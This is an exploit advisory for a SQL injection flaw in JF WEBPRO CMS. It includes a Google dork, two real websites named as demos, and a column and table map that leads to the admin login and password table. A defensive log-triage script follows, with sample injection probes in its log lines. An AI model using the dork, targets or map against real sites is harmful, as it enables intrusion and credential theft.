JF WEBPRO CMS SQL Injection Vulnerability

Author: Ashiyane Digital Security Team, Published: 04-04-2013
##############################################################################
# Exploit Title: JF WEBPRO CMS SQL Injection Vulnerability
# Google Dork: allinurl:"exibir_noticias.php?id="
# Date: 3/4/2013
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.jfwebpro.com.br
# Version: All Versions
# Tested on: Windows 7 Starter SP1
# Category: Web Application
# Security Risk : High - SQL Injection
# Application Language: Spanish
##############################################################################
# Reported By : MR.SoCiAl-EnGiNeEr | Ashiyane Digital Security Team
# Author Home Page: http://ashiyane.org
# SPECIAL THANKS TO : Hasani_farhad,hossein19123,MR.SAMAN,Black-Hole
# AND ALL ASHIYANE DIGITAL SECURITY MEMBERS
##############################################################################
# Location: http://www.domain.com/exibir_noticias.php?id= [ SQL CODE ]
# Demo 1: http://www.70km.com.br/exibir_noticias.php?id=16
# Demo 2: http://www.consultoriasousalima.com.br/exibir_noticias.php?id=2
##############################################################################
# Admin Login Page:
#
# http://www.domain.com/login.php
#======================================================+
# SQL Injection Help:
# - Columns Count : 7
# - Valid Column: 2
#======================================================+
# Database Map:
#
# Database
# |
# +-adm (columns)=> id , login , senha
# |
# +-noticiaas (columns)=> id , titulo , foto , autor , texto , data , fonte
#
##############################################################################
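
Added example (not part of the original advisory or the vendor's code): a log triage script that flags requests to exibir_noticias.php whose id parameter is not a plain integer. The same digits-only allowlist, combined with a parameterized query, is the server-side fix for this parameter. The combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [04/Apr/2013:10:00:01 +0000] "GET /exibir_noticias.php?id=16 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [04/Apr/2013:10:00:07 +0000] "GET /exibir_noticias.php?id=16%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.0.2.44 - - [04/Apr/2013:10:00:09 +0000] "GET /exibir_noticias.php?id=2%20or%201%3D1 HTTP/1.1" 200 298 "-" "Mozilla/5.0"
192.0.2.10 - - [04/Apr/2013:10:01:30 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.77 - - [04/Apr/2013:10:02:00 +0000] "GET /exibir_noticias.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
TARGET_SCRIPT = "exibir_noticias.php"  # endpoint named in the advisory


def is_valid_id(value):
    """Allowlist: a news id is 1 to 10 ASCII digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def suspicious_requests(log_text):
    """Return (client_ip, decoded_id) for endpoint requests with a non-numeric id."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + TARGET_SCRIPT):
            continue  # other scripts are out of scope for this check
        # parse_qs percent-decodes values and keeps repeated parameters,
        # so encoded quotes and a second id= value are both inspected.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not is_valid_id(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric id={value!r}")
```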
